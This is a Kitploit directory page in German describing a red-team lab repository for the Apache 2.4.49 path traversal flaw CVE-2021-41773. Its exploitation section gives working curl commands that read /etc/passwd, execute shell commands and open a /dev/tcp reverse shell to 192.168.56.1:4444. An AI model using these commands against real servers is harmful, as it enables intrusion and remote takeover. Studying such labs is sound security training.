Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-41773-RedTeam — Apache 2.4.49 Path Traversal RCE | Kitploit
Tools/GitHubGitHub/sobanahmed6061/cve-2021-41773-redteam
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubsobanahmed6061/cve-2021-41773-redteam

CVE-2021-41773-RedTeam

Apache 2.4.49 Path Traversal RCE

Repository anzeigen
1vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-41773 — Apache HTTP Server 2.4.49 Path Traversal / RCE

ITSOLERA Cybersecurity Department — Red Team Task #3
Team: Offensive Team Zeta
Datum: 18. März 2026


⚠️ Haftungsausschluss

Dieses Repository dient ausschließlich zu Bildungszwecken.
Alle Tests wurden in einem isolierten lokalen Docker-Lab durchgeführt.
Niemals gegen Live-, Produktions- oder Drittanbietersysteme verwenden.


CVE-Zusammenfassung

FeldDetail
CVE-IDCVE-2021-41773
CVSS9.8 KRITISCH
BetroffenNur Apache HTTP Server 2.4.49
TypPath Traversal + Remote Code Execution
Behoben inApache 2.4.51

Repository-Inhalt

DateiBeschreibung
poc_41773.pyPython PoC-Exploit-Skript mit Team-Zeta-Banner
docker-compose.ymlEinrichtung einer verwundbaren Laborumgebung
offensive_zeta_shell.txtLive-Sitzungsprotokoll – Beweis der Ausnutzung
screenshots/Beweisscreenshots
Offensive_Team_Zeta_FINAL_Report.pdfVollständiger Exploit-Bericht

Lab-Einrichtung

root@kitploit:~
# Pull the vulnerable image
sudo docker pull blueteamsteve/cve-2021-41773:with-cgid

# Start the lab
docker-compose up -d

# Verify Apache 2.4.49 is running
curl -I http://localhost:8080/
# Must show: Server: Apache/2.4.49

Ausnutzung

root@kitploit:~
# File read via path traversal
curl --path-as-is \
    'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'

# Remote code execution
curl --path-as-is \
    -d 'echo Content-Type: text/plain; echo; id' \
    'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

# Reverse shell (replace IP with your machine IP)
curl --path-as-is \
    -d "echo Content-Type: text/plain; echo; bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'" \
    "http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"

Referenzen

  • https://nvd.nist.gov/vuln/detail/CVE-2021-41773
  • https://www.exploit-db.com/exploits/50383
  • https://httpd.apache.org/security/vulnerabilities_24.html
Tool herunterladen